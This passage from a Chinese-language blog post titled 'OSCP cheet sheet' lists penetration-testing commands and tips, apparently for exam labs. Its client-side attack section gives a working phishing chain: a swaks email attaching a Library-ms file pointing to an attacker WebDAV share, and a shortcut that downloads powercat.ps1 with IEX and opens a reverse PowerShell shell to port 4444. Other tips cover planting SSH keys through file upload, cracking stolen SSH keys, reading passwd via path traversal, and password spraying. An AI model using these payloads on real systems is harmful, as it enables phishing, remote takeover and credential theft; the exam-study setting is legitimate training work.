<figure class="highlight shell"><table><tr><td class="gutter"><pre><span class="line">1</span><br><span class="line">2</span><br><span class="line">3</span><br><span class="line">4</span><br><span class="line">5</span><br><span class="line">6</span><br></pre></td><td class="code"><pre><span class="line">dir /s $filename</span><br><span class="line"><span class="meta prompt_">#</span><span class="language-bash">/p表示循环输出，不一次性输出</span></span><br><span class="line">dir /s *.exe /p</span><br><span class="line">tree /f &gt; tree.txt然后搜索tree.txt</span><br><span class="line"><span class="meta prompt_">#</span><span class="language-bash">使用forfiles</span></span><br><span class="line">forfiles /p c:\windows /s /m notepad.exe /c &quot;command you want to execute&quot;</span><br></pre></td></tr></table></figure>

<p>使用whoami查看用户SID，管理员是5000，用户从1001开始</p>
<figure class="highlight plaintext"><table><tr><td class="gutter"><pre><span class="line">1</span><br><span class="line">2</span><br><span class="line">3</span><br><span class="line">4</span><br><span class="line">5</span><br><span class="line">6</span><br><span class="line">7</span><br><span class="line">8</span><br></pre></td><td class="code"><pre><span class="line">PS C:\Users\J0ker&gt; whoami /user</span><br><span class="line"></span><br><span class="line">用户信息</span><br><span class="line">----------------</span><br><span class="line"></span><br><span class="line">用户名                SID</span><br><span class="line">===================== =============================================</span><br><span class="line">desktop-kfa4a5s\j0ker S-1-5-21-2231775247-161512554-3901611509-1001</span><br></pre></td></tr></table></figure>

<p>查看当前用户权限，属于administrator组就有管理员权限</p>
<figure class="highlight plaintext"><table><tr><td class="gutter"><pre><span class="line">1</span><br></pre></td><td class="code"><pre><span class="line">whoami /user</span><br></pre></td></tr></table></figure>

<p>查看文件权限，（F）表示所有权限</p>
<figure class="highlight plaintext"><table><tr><td class="gutter"><pre><span class="line">1</span><br></pre></td><td class="code"><pre><span class="line">icacls $fileName</span><br></pre></td></tr></table></figure>

<p>查看运行的所有进程</p>
<figure class="highlight plaintext"><table><tr><td class="gutter"><pre><span class="line">1</span><br></pre></td><td class="code"><pre><span class="line">tasklist</span><br></pre></td></tr></table></figure>

<p>查看网页源码</p>
<figure class="highlight plaintext"><table><tr><td class="gutter"><pre><span class="line">1</span><br><span class="line">2</span><br></pre></td><td class="code"><pre><span class="line">iwr看网页源码</span><br><span class="line">PS C:\Tools&gt; (iwr -UseDefaultCredentials http://web04).Content | findstr /i &quot;OS&#123;&quot;</span><br></pre></td></tr></table></figure>

<p>开启服务（Start-Service无法使用的时候）</p>
<figure class="highlight plaintext"><table><tr><td class="gutter"><pre><span class="line">1</span><br></pre></td><td class="code"><pre><span class="line">sc start audittracker</span><br></pre></td></tr></table></figure>

<p>powershell进cmd</p>
<figure class="highlight plaintext"><table><tr><td class="gutter"><pre><span class="line">1</span><br></pre></td><td class="code"><pre><span class="line">cmd dir</span><br></pre></td></tr></table></figure>

<p>删除共享</p>
<figure class="highlight plaintext"><table><tr><td class="gutter"><pre><span class="line">1</span><br></pre></td><td class="code"><pre><span class="line">net use * /del /y</span><br></pre></td></tr></table></figure>

<p>powershell脚本.ps1中执行exe</p>
<figure class="highlight plaintext"><table><tr><td class="gutter"><pre><span class="line">1</span><br><span class="line">2</span><br></pre></td><td class="code"><pre><span class="line">&amp; C:\updatecollector\updatecollctor.exe</span><br><span class="line">&amp;运算符用于调用程序，这里它尝试运行位于C:\updatecollector\路径下的updatecollctor.exe程序。</span><br></pre></td></tr></table></figure>

<p>powershell -a 和powershell -c，下载和执行方式</p>
<figure class="highlight plaintext"><table><tr><td class="gutter"><pre><span class="line">1</span><br></pre></td><td class="code"><pre><span class="line">powershell -c &quot;iwr -uri http://192.168.45.192/test.txt -Outfile test.txt&quot;</span><br></pre></td></tr></table></figure>

<h2 id="客户端攻击"><a href="#客户端攻击" class="headerlink" title="客户端攻击"></a>客户端攻击</h2><p>webdav目录执行</p>
<figure class="highlight plaintext"><table><tr><td class="gutter"><pre><span class="line">1</span><br></pre></td><td class="code"><pre><span class="line">/home/yu1e/.local/bin/wsgidav --host=0.0.0.0 --port=80 --auth=anonymous --root /home/yu1e/webdav/</span><br></pre></td></tr></table></figure>

<p>powercat.ps1的目录下</p>
<figure class="highlight plaintext"><table><tr><td class="gutter"><pre><span class="line">1</span><br></pre></td><td class="code"><pre><span class="line">python3 -m http.server</span><br></pre></td></tr></table></figure>

<p>webdav目录下放着powershell.lnk和body.txt和config.ms，开监听</p>
<p>发邮件（from参数的用户和登录邮件服务的用户最好一致）</p>
<figure class="highlight plaintext"><table><tr><td class="gutter"><pre><span class="line">1</span><br></pre></td><td class="code"><pre><span class="line">sudo swaks -t jim@relia.com --from maildmz@relia.com --attach @config.Library-ms --server 192.168.202.189 --body body.txt --header &quot;Subject: Staging Script&quot; -ap</span><br></pre></td></tr></table></figure>

<p>config.Library-ms内容</p>
<figure class="highlight plaintext"><table><tr><td class="gutter"><pre><span class="line">1</span><br><span class="line">2</span><br><span class="line">3</span><br><span class="line">4</span><br><span class="line">5</span><br><span class="line">6</span><br><span class="line">7</span><br><span class="line">8</span><br><span class="line">9</span><br><span class="line">10</span><br><span class="line">11</span><br><span class="line">12</span><br><span class="line">13</span><br><span class="line">14</span><br><span class="line">15</span><br><span class="line">16</span><br><span class="line">17</span><br><span class="line">18</span><br><span class="line">19</span><br><span class="line">20</span><br></pre></td><td class="code"><pre><span class="line">└─$ cat config.Library-ms </span><br><span class="line">&lt;?xml version=&quot;1.0&quot; encoding=&quot;UTF-8&quot;?&gt;</span><br><span class="line">&lt;libraryDescription xmlns=&quot;http://schemas.microsoft.com/windows/2009/library&quot;&gt;</span><br><span class="line">&lt;name&gt;@windows.storage.dll,-34582&lt;/name&gt;</span><br><span class="line">&lt;version&gt;6&lt;/version&gt;</span><br><span class="line">&lt;isLibraryPinned&gt;true&lt;/isLibraryPinned&gt;</span><br><span class="line">&lt;iconReference&gt;imageres.dll,-1003&lt;/iconReference&gt;</span><br><span class="line">&lt;templateInfo&gt;</span><br><span class="line">&lt;folderType&gt;&#123;7d49d726-3c21-4f05-99aa-fdc2c9474656&#125;&lt;/folderType&gt;</span><br><span class="line">&lt;/templateInfo&gt;</span><br><span class="line">&lt;searchConnectorDescriptionList&gt;</span><br><span class="line">&lt;searchConnectorDescription&gt;</span><br><span class="line">&lt;isDefaultSaveLocation&gt;true&lt;/isDefaultSaveLocation&gt;</span><br><span class="line">&lt;isSupported&gt;false&lt;/isSupported&gt;</span><br><span class="line">&lt;simpleLocation&gt;</span><br><span class="line">&lt;url&gt;http://192.168.45.167&lt;/url&gt;</span><br><span class="line">&lt;/simpleLocation&gt;</span><br><span class="line">&lt;/searchConnectorDescription&gt;</span><br><span class="line">&lt;/searchConnectorDescriptionList&gt;</span><br><span class="line">&lt;/libraryDescription&gt; </span><br></pre></td></tr></table></figure>

<p>powershell.lnk文件，新建快捷方式，指向</p>
<figure class="highlight plaintext"><table><tr><td class="gutter"><pre><span class="line">1</span><br><span class="line">2</span><br></pre></td><td class="code"><pre><span class="line">powershell.exe -c &quot;IEX(New-Object System.Net.WebClient).DownloadString(&#x27;http://192.168.119.3:8000/powercat.ps1&#x27;);</span><br><span class="line">powercat -c 192.168.119.3 -p 4444 -e powershell&quot;</span><br></pre></td></tr></table></figure>



<h2 id="其他思路"><a href="#其他思路" class="headerlink" title="其他思路"></a>其他思路</h2><figure class="highlight plaintext"><table><tr><td class="gutter"><pre><span class="line">1</span><br><span class="line">2</span><br><span class="line">3</span><br><span class="line">4</span><br><span class="line">5</span><br><span class="line">6</span><br><span class="line">7</span><br><span class="line">8</span><br><span class="line">9</span><br><span class="line">10</span><br><span class="line">11</span><br><span class="line">12</span><br><span class="line">13</span><br><span class="line">14</span><br><span class="line">15</span><br><span class="line">16</span><br><span class="line">17</span><br><span class="line">18</span><br><span class="line">19</span><br><span class="line">20</span><br><span class="line">21</span><br><span class="line">22</span><br><span class="line">23</span><br><span class="line">24</span><br><span class="line">25</span><br><span class="line">26</span><br><span class="line">27</span><br><span class="line">28</span><br><span class="line">29</span><br><span class="line">30</span><br><span class="line">31</span><br><span class="line">32</span><br><span class="line">33</span><br><span class="line">34</span><br><span class="line">35</span><br><span class="line">36</span><br><span class="line">37</span><br><span class="line">38</span><br><span class="line">39</span><br><span class="line">40</span><br><span class="line">41</span><br><span class="line">42</span><br><span class="line">43</span><br><span class="line">44</span><br><span class="line">45</span><br><span class="line">46</span><br><span class="line">47</span><br><span class="line">48</span><br><span class="line">49</span><br><span class="line">50</span><br><span class="line">51</span><br><span class="line">52</span><br><span class="line">53</span><br><span class="line">54</span><br><span class="line">55</span><br><span class="line">56</span><br><span class="line">57</span><br><span class="line">58</span><br><span class="line">59</span><br><span class="line">60</span><br><span class="line">61</span><br><span class="line">62</span><br><span class="line">63</span><br><span class="line">64</span><br><span class="line">65</span><br><span class="line">66</span><br><span class="line">67</span><br><span class="line">68</span><br><span class="line">69</span><br><span class="line">70</span><br><span class="line">71</span><br><span class="line">72</span><br><span class="line">73</span><br><span class="line">74</span><br><span class="line">75</span><br><span class="line">76</span><br><span class="line">77</span><br></pre></td><td class="code"><pre><span class="line">记得扫目录中的子目录</span><br><span class="line"></span><br><span class="line">现成的EXP不能用的话，记得看漏洞描述</span><br><span class="line"></span><br><span class="line">弱口令试一下用户名和密码都是用户名，使用su切换用户</span><br><span class="line"></span><br><span class="line">如果是固定的那种系统，可以搜默认账号密码，然后拿默认账号去爆破密码</span><br><span class="line"></span><br><span class="line">一定记得看网页源码</span><br><span class="line"></span><br><span class="line">有时候需要切换到普通用户，再拿root</span><br><span class="line"></span><br><span class="line">文件包含可以读取passwd文件然后破解</span><br><span class="line"></span><br><span class="line">进去有phpmyadmin的系统，找数据库配置文件，拿来密码复用</span><br><span class="line"></span><br><span class="line">记得读取passwd文件然后破解</span><br><span class="line"></span><br><span class="line">如果有文件上传，可以考虑上传一个txt之类的文件到.ssh/authorized_keys上去，然后登录（下面的例子实际上是上传之后用filename参数把上传之后的文件名改了）</span><br><span class="line">ssh-keygen</span><br><span class="line">sudo chmod 600 id_rsa</span><br><span class="line">sudo cp id_rsa.pub id_rsa.txt</span><br><span class="line">curl -i -L -X POST -F file=&quot;@/id_rsa.txt&quot; -F filename=”/home/xxx/.ssh/authorized_keys” http://xxx</span><br><span class="line">sudo ssh -oHostKeyAlgorithms=+ssh-dss alfredo@192.168.185.249 -p 25022 -i /home/sinner/Documents/oscp/id_rsa</span><br><span class="line"></span><br><span class="line">直接访问看不到的，curl有时候可以看到</span><br><span class="line"></span><br><span class="line">文件上传可以考虑覆盖.ssh/authorized_keys</span><br><span class="line"></span><br><span class="line">目录穿越试一下把/编码，就是%2F，或者改成\，就是%5C</span><br><span class="line"></span><br><span class="line">xfreerdp连不上的话机上/cert-ignore</span><br><span class="line">sudo ip l s dev tun0 mtu 1300(非必要)</span><br><span class="line">sudo proxychains xfreerdp /v:172.16.167.200 /u:luiza /timeout:60000</span><br><span class="line">sudo proxychains xfreerdp /v:172.16.119.200 /u:luiza /cert-ignore /timeout:60000</span><br><span class="line"></span><br><span class="line">读文件的时候如果能读到/home/daniela/.ssh/id_rsa就读出来，然后破解</span><br><span class="line">ssh2john id_rsa &gt; ssh.hash</span><br><span class="line">john --wordlist=/usr/share/wordlists/rockyou.txt ssh.hash</span><br><span class="line"></span><br><span class="line">ssh2john id_rsa &gt; ssh.hash</span><br><span class="line">cat ssh.hash 看$sshng$x是$几</span><br><span class="line">hashcat -h | grep -i &quot;ssh&quot; 找module</span><br><span class="line">hashcat -m 22921 ssh.hash ssh.passwords --force（不一定行）</span><br><span class="line"></span><br><span class="line"></span><br><span class="line">如果发现了git，进web目录（不一定必要），然后查看日志git log，找到对应的日志编号</span><br><span class="line">commit 612ff5783cc5dbd1e0e008523dba83374a84aaf1，</span><br><span class="line">然后运行git show 612ff5783cc5dbd1e0e008523dba83374a84aaf1</span><br><span class="line"></span><br><span class="line"></span><br><span class="line">目录穿越文件任意读，读passwd，然后读ssh key</span><br><span class="line">ssh-key包括的种类id_ed25519 id_ecdsa id_dsa id_rsa</span><br><span class="line"></span><br><span class="line">有时候可以查看监听的端口来发现只对本地开放的端口和服务</span><br><span class="line"></span><br><span class="line">文件包含漏洞往上层目录穿越，不仅仅是绝对路径</span><br><span class="line"></span><br><span class="line">linpeas关注可写目录</span><br><span class="line"></span><br><span class="line">看到？参数试一下文件包含</span><br><span class="line"></span><br><span class="line">服务看不到不等于没有，可能是没权限看</span><br><span class="line"></span><br><span class="line">上pspy看进程，或许有口令</span><br><span class="line"></span><br><span class="line">有的普通用户也能进root</span><br><span class="line"></span><br><span class="line">Windows提权添加用户的时候密码选复杂点的</span><br><span class="line"></span><br><span class="line">记得密码喷洒</span><br><span class="line"></span><br><span class="line">查看Web框架是Apache 2.4.49，找到路径穿越的洞</span><br><span class="line"></span><br><span class="line">.php不行，把后缀改为pHP</span><br><span class="line"></span><br><span class="line">查看用户的history文件</span><br></pre></td></tr></table></figure>

<h2 id="工具"><a href="#工具" class="headerlink" title="工具"></a>工具</h2><p>内网扫描</p>
<figure class="highlight plaintext"><table><tr><td class="gutter"><pre><span class="line">1</span><br><span class="line">2</span><br></pre></td><td class="code"><pre><span class="line">https://github.com/elddy/NimScan</span><br><span class="line">https://github.com/sh1yan/Lscan</span><br></pre></td></tr></table></figure>

<p>工具网站</p>
<figure class="highlight plaintext"><table><tr><td class="gutter"><pre><span class="line">1</span><br><span class="line">2</span><br><span class="line">3</span><br><span class="line">4</span><br><span class="line">5</span><br></pre></td><td class="code"><pre><span class="line">cyberchef</span><br><span class="line">https://gtfobins.github.io</span><br><span class="line">https://book.hacktricks.xyz/</span><br><span class="line">https://www.hackingarticles.in/msfvenom-cheatsheet-windows-exploitation/</span><br><span class="line"></span><br></pre></td></tr></table></figure>

</div><div class="article-licensing box"><div class="licensing-title"><p>OSCP cheet sheet</p><p><a href="https://1ue0v.github.io/2024/06/05/渗透杂项/">https://1ue0v.github.io/2024/06/05/渗透杂项/</a></p></div><div class="licensing-meta level is-mobile"><div class="level-left"><div class="level-item is-narrow"><div><h6>Author</h6><p>1ue0v</p></div></div><div class="level-item is-narrow"><div><h6>Posted on</h6><p>2024-06-05</p></div></div><div class="level-item is-narrow"><div><h6>Updated on</h6><p>2024-11-29</p></div></div><div class="level-item is-narrow"><div><h6>Licensed under</h6><p><a class="icons" rel="noopener" target="_blank" title="Creative Commons" href="https://creativecommons.org/"><i class="icon fab fa-creative-commons"></i></a><a class="icons" rel="noopener" target="_blank" title="Attribution" href="https://creativecommons.org/licenses/by/4.0/"><i class="icon fab fa-creative-commons-by"></i></a><a class="icons" rel="noopener" target="_blank" title="Noncommercial" href="https://creativecommons.org/licenses/by-nc/4.0/"><i class="icon fab fa-creative-commons-nc"></i></a></p></div></div></div></div></div><div class="article-tags is-size-7 mb-4"><span class="mr-2">#</span><a class="link-muted mr-2" rel="tag" href="/tags/Pentest/">Pentest</a></div><!--!--></article></div><!--!--><nav class="post-navigation mt-4 level is-mobile"><div class="level-start"><a class="article-nav-prev level level-item link-muted" href="/2024/06/05/Tunnel-Technology/"><i class="level-item fas fa-chevron-left"></i><span class="level-item">渗透测试中的端口转发</span></a></div><div class="level-end"><a class="article-nav-next level level-item link-muted" href="/2024/04/17/%E4%BD%BF%E7%94%A8hashcat%E7%A0%B4%E8%A7%A3shadow%E6%96%87%E4%BB%B6/"><span class="level-item">使用hashcat破解shadow文件</span><i class="level-item fas fa-chevron-right"></i></a></div></nav><!--!--></div><div class="column column-left is-4-tablet is-4-desktop is-3-widescreen  order-1"><div class="card widget" data-type="profile"><div class="card-content"><nav class="level"><div class="level-item has-text-centered flex-shrink-1"><div><figure class="image is-128x128 mx-auto mb-2"><img class="avatar" src="https://cdn.jsdelivr.net/gh/alohe/avatars/png/notion_14.png" alt="1ue0v"></figure><p class="title is-size-4 is-block" style="line-height:inherit;">1ue0v</p><p class="is-size-6 is-block">CowHorse</p><p class="is-size-6 is-flex justify-content-center"><i class="fas fa-map-marker-alt mr-1"></i><span>RS Company</span></p></div></div></nav><nav class="level is-mobile"><div class="level-item has-text-centered is-marginless"><div><p class="heading">Posts</p><a href="/archives/"><p class="title">33</p></a></div></div><div class="level-item has-text-centered is-marginless"><div><p class="heading">Categories</p><a href="/categories/"><p class="title">0</p></a></div></div><div class="level-item has-text-centered is-marginless"><div><p class="heading">Tags</p><a href="/tags/"><p class="title">5</p></a></div></div></nav><div class="level"><a class="level-item button is-primary is-rounded" href="https://github.com/sadqdsadsadqwd" target="_blank" rel="me noopener">Follow</a></div><div class="level is-mobile is-multiline"><a class="level-item button is-transparent is-marginless" target="_blank" rel="me noopener" title="Github" href="https://github.com/sadsdqdsdqdsqdsd"><i class="fab fa-github"></i></a><a class="level-item button is-transparent is-marginless" target="_blank" rel="me noopener" title="RSS" href="/"><i class="fas fa-rss"></i></a></div></div></div><div class="card widget" data-type="links"><div class="card-content"><div class="menu"><h3 class="menu-label">Links</h3><ul class="menu-list"><li><a class="level is-mobile" href="https://pwya.github.io/" target="_blank" rel="noopener"><span class="level-left"><span class="level-item">Friend Link</span></span><span class="level-right"><span class="level-item tag">pwya.github.io</span></span></a></li></ul></div></div></div><!--!--><div class="card widget" data-type="archives"><div class="card-content"><div class="menu"><h3 class="menu-label">Archives</h3><ul class="menu-list"><li><a class="level is-mobile" href="/archives/2024/11/"><span class="level-start"><span class="level-item">November 2024</span></span><span class="level-end"><span class="level-item tag">12</span></span></a></li><li><a class="level is-mobile" href="/archives/2024/10/"><span class="level-start"><span class="level-item">October 2024</span></span><span class="level-end"><span class="level-item tag">7</span></span></a></li><li><a class="level is-mobile" href="/archives/2024/09/"><span class="level-start"><span class="level-item">September 2024</span></span><span class="level-end"><span class="level-item tag">3</span></span></a></li><li><a class="level is-mobile" href="/archives/2024/06/"><span class="level-start"><span class="level-item">June 2024</span></span><span class="level-end"><span class="level-item tag">9</span></span></a></li><li><a class="level is-mobile" href="/archives/2024/04/"><span class="level-start"><span class="level-item">April 2024</span></span><span class="level-end"><span class="level-item tag">1</span></span></a></li><li><a class="level is-mobile" href="/archives/2024/03/"><span class="level-start"><span class="level-item">March 2024</span></span><span class="level-end"><span class="level-item tag">1</span></span></a></li></ul></div></div></div><div class="card widget" data-type="tags"><div class="card-content"><div class="menu"><h3 class="menu-label">Tags</h3><div class="field is-grouped is-grouped-multiline"><div class="control"><a class="tags has-addons" href="/tags/Malware/"><span class="tag">Malware</span><span class="tag">11</span></a></div><div class="control"><a class="tags has-addons" href="/tags/Pentest/"><span class="tag">Pentest</span><span class="tag">8</span></a></div><div class="control"><a class="tags has-addons" href="/tags/RealWorld/"><span class="tag">RealWorld</span><span class="tag">3</span></a></div><div class="control"><a class="tags has-addons" href="/tags/Tips/"><span class="tag">Tips</span><span class="tag">7</span></a></div><div class="control"><a class="tags has-addons" href="/tags/Web/"><span class="tag">Web</span><span class="tag">4</span></a></div></div></div></div></div><div class="card widget" data-type="subscribe-email"><div class="card-content"><div class="menu"><h3 class="menu-label">Subscribe for updates</h3><form action="https://feedburner.google.com/fb/a/mailverify" method="post" target="popupwindow" onsubmit="window.open(&#039;https://feedburner.google.com/fb/a/mailverify?uri=&#039;,&#039;popupwindow&#039;,&#039;scrollbars=yes,width=550,height=520&#039;);return true"><input type="hidden" value="" name="uri"><input type="hidden" name="loc" value="en_US"><div class="field has-addons"><div class="control has-icons-left is-expanded"><input class="input" name="email" type="email" placeholder="Email"><span class="icon is-small is-left"><i class="fas fa-envelope"></i></span></div><div class="control"><input class="button" type="submit" value="Subscribe"></div></div></form></div></div></div><div class="card widget" data-type="subscribe-email"><div class="card-content"><div class="menu"><h3 class="menu-label">follow.it</h3><form action="" method="post" target="_blank"><div class="field has-addons"><div class="control has-icons-left is-expanded"><input class="input" name="email" type="email" placeholder="Email"><span class="icon is-small is-left"><i class="fas fa-envelope"></i></span></div><div class="control"><input class="button" type="submit" value="Subscribe"></div></div></form></div></div></div><div class="column-right-shadow is-hidden-widescreen is-sticky"></div></div><div class="column column-right is-4-tablet is-4-desktop is-3-widescreen is-hidden-touch is-hidden-desktop-only order-3 is-sticky"><div class="card widget" id="toc" data-type="toc"><div class="card-content"><div class="menu"><h3 class="menu-label">Catalogue</h3><ul class="menu-list"><li><a class="level is-mobile" href="#扫描命令"><span class="level-left"><span class="level-item">1</span><span class="level-item">扫描命令</span></span></a></li><li><a class="level is-mobile" href="#SSH后门"><span class="level-left"><span class="level-item">2</span><span class="level-item">SSH后门</span></span></a></li><li><a class="level is-mobile" href="#MSF"><span class="level-left"><span class="level-item">3</span><span class="level-item">MSF</span></span></a></li><li><a class="level is-mobile" href="#Meterpreter-Shell"><span class="level-left"><span class="level-item">4</span><span class="level-item">Meterpreter Shell</span></span></a></li><li><a class="level is-mobile" href="#跨平台编译"><span class="level-left"><span class="level-item">5</span><span class="level-item">跨平台编译</span></span></a></li><li><a class="level is-mobile" href="#SMB-Service"><span class="level-left"><span class="level-item">6</span><span class="level-item">SMB Service</span></span></a></li><li><a class="level is-mobile" href="#字符串加解密相关"><span class="level-left"><span class="level-item">7</span><span class="level-item">字符串加解密相关</span></span></a></li><li><a class="level is-mobile" href="#压缩包破解"><span class="level-left"><span class="level-item">8</span><span class="level-item">压缩包破解</span></span></a></li><li><a class="level is-mobile" href="#渗透常用命令"><span class="level-left"><span class="level-item">9</span><span class="level-item">渗透常用命令</span></span></a></li><li><a class="level is-mobile" href="#系统常用命令"><span class="level-left"><span class="level-item">10</span><span class="level-item">系统常用命令</span></span></a><ul class="menu-list"><li><a class="level is-mobile" href="#Linux"><span class="level-left"><span class="level-item">10.1</span><span class="level-item">Linux</span></span></a></li><li><a class="level is-mobile" href="#Windows"><span class="level-left"><span class="level-item">10.2</span><span class="level-item">Windows</span></span></a></li></ul></li><li><a class="level is-mobile" href="#客户端攻击"><span class="level-left"><span class="level-item">11</span><span class="level-item">客户端攻击</span></span></a></li><li><a class="level is-mobile" href="#其他思路"><span class="level-left"><span class="level-item">12</span><span class="level-item">其他思路</span></span></a></li><li><a class="level is-mobile" href="#工具"><span class="level-left"><span class="level-item">13</span><span class="level-item">工具</span></span></a></li></ul></div></div><style>#toc .menu-list > li > a.is-active + .menu-list { display: block; }#toc .menu-list > li > a + .menu-list { display: none; }</style><script src="/js/toc.js" defer></script></div><div class="card widget" data-type="recent-posts"><div class="card-content"><h3 class="menu-label">Recents</h3><article class="media"><div class="media-content"><p class="date"><time dateTime="2024-11-27T08:36:42.000Z">2024-11-27</time></p><p class="title"><a href="/2024/11/27/%E4%B8%80%E6%AC%BELinux%E7%AB%AF%E5%8F%A3%E5%A4%8D%E7%94%A8%E5%9E%8B%E9%9A%90%E8%94%BD%E5%90%8E%E9%97%A8/">一款Linux端口复用型隐蔽后门</a></p></div></article><article class="media"><div class="media-content"><p class="date"><time dateTime="2024-11-27T06:36:42.000Z">2024-11-27</time></p><p class="title"><a href="/2024/11/27/Linux%E7%B3%BB%E7%BB%9F%E7%AB%AF%E5%8F%A3%E5%A4%8D%E7%94%A8%E5%8E%9F%E7%90%86/">Linux端口复用原理</a></p></div></article><article class="media"><div class="media-content"><p class="date"><time dateTime="2024-11-18T06:36:42.000Z">2024-11-18</time></p><p class="title"><a href="/2024/11/18/%E9%80%9A%E8%BF%87%E6%81%B6%E6%84%8F%E7%A8%8B%E5%BA%8F%E6%88%AA%E8%8E%B7%E8%BD%AF%E4%BB%B6%E7%9A%84%E7%94%A8%E6%88%B7%E5%90%8D%E5%8F%A3%E4%BB%A4/">通过恶意程序截获软件的用户口令</a></p></div></article><article class="media"><div class="media-content"><p class="date"><time dateTime="2024-11-17T08:36:42.000Z">2024-11-17</time></p><p class="title"><a href="/2024/11/17/%E5%A6%82%E4%BD%95%E8%AF%86%E5%88%ABpayload%E6%98%AF%E5%B7%B2%E5%9C%A8%E5%86%85%E5%AD%98%E4%B8%AD%E5%8A%A0%E8%BD%BD/">如何识别payload是否已在内存中加载</a></p></div></article><article class="media"><div class="media-content"><p class="date"><time dateTime="2024-11-17T06:36:42.000Z">2024-11-17</time></p><p class="title"><a href="/2024/11/17/Windows%20Hooking/">Windows Hooking</a></p></div></article></div></div></div></div></div></section><footer class="footer"><div class="container"><div class="level"><div class="level-start"><a class="footer-logo is-block mb-2" href="/"><img src="/img/logo.svg" alt="Running Man" height="28"></a><p class="is-size-7"><span>&copy; 2024 1ue0v</span>  Powered by <a href="https://hexo.io/" target="_blank" rel="noopener">Hexo</a> &amp; <a href="https://github.com/ppoffice/hexo-theme-icarus" target="_blank" rel="noopener">Icarus</a></p><p class="is-size-7">© 2019</p></div><div class="level-end"><div class="field has-addons"><p class="control"><a class="button is-transparent is-large" target="_blank" rel="noopener" title="Creative Commons" href="https://creativecommons.org/"><i class="fab fa-creative-commons"></i></a></p><p class="control"><a class="button is-transparent is-large" target="_blank" rel="noopener" title="Attribution 4.0 International" href="https://creativecommons.org/licenses/by/4.0/"><i class="fab fa-creative-commons-by"></i></a></p><p class="control"><a class="button is-transparent is-large" target="_blank" rel="noopener" title="Download on GitHub" href="https://github.com/ppoffice/hexo-theme-icarus"><i class="fab fa-github"></i></a></p></div></div></div></div></footer><script src="https://cdn.jsdelivr.net/npm/jquery@3.3.1/dist/jquery.min.js"></script><script src="https://cdn.jsdelivr.net/npm/moment@2.22.2/min/moment-with-locales.min.js"></script><script src="https://cdn.jsdelivr.net/npm/clipboard@2.0.4/dist/clipboard.min.js" defer></script><script>moment.locale("en");</script><script>var IcarusThemeSettings = {
            article: {
                highlight: {
                    clipboard: true,
                    fold: 'unfolded'
                }
            }
        };</script><script data-pjax src="/js/column.js"></script><script src="/js/animation.js"></script><a id="back-to-top" title="Back to top" href="javascript:;"><i class="fas fa-chevron-up"></i></a><script data-pjax src="/js/back_to_top.js" defer></script><!--!--><!--!--><!--!--><script src="https://cdn.jsdelivr.net/npm/cookieconsent@3.1.1/build/cookieconsent.min.js" defer></script><script>window.addEventListener("load", () => {
      window.cookieconsent.initialise({
        type: "info",
        theme: "edgeless",
        static: false,
        position: "bottom-left",
        content: {
          message: "This website uses cookies to improve your experience.",
          dismiss: "Got it!",
          allow: "Allow cookies",
          deny: "Decline",
          link: "Learn more",
          policy: "Cookie Policy",
          href: "https://www.cookiesandyou.com/",
        },
        palette: {
          popup: {
            background: "#edeff5",
            text: "#838391"
          },
          button: {
            background: "#4b81e8"
          },
        },
      });
    });</script><script src="https://cdn.jsdelivr.net/npm/lightgallery@1.10.0/dist/js/lightgallery.min.js" defer></script><script src="https://cdn.jsdelivr.net/npm/justifiedGallery@3.8.1/dist/js/jquery.justifiedGallery.min.js" defer></script><script>window.addEventListener("load", () => {
            if (typeof $.fn.lightGallery === 'function') {
                $('.article').lightGallery({ selector: '.gallery-item' });
            }
            if (typeof $.fn.justifiedGallery === 'function') {
                if ($('.justified-gallery > p > .gallery-item').length) {
                    $('.justified-gallery > p > .gallery-item').unwrap();
                }
                $('.justified-gallery').justifiedGallery();
            }
        });</script><!--!--><!--!--><script src="https://cdn.jsdelivr.net/npm/pjax@0.2.8/pjax.min.js"></script><script src="/js/pjax.js"></script><!--!--><!--!--><!--!--><script data-pjax src="/js/main.js" defer></script><div class="searchbox"><div class="searchbox-container"><div class="searchbox-header"><div class="searchbox-input-container"><input class="searchbox-input" type="text" placeholder="Type something..."></div><a class="searchbox-close" href="javascript:;">×</a></div><div class="searchbox-body"></div></div></div><script src="/js/insight.js" defer></script><script>document.addEventListener('DOMContentLoaded', function () {
            loadInsight({"contentUrl":"/content.json"}, {"hint":"Type something...","untitled":"(Untitled)","posts":"Posts","pages":"Pages","categories":"Categories","tags":"Tags"});
        });</script></body></html>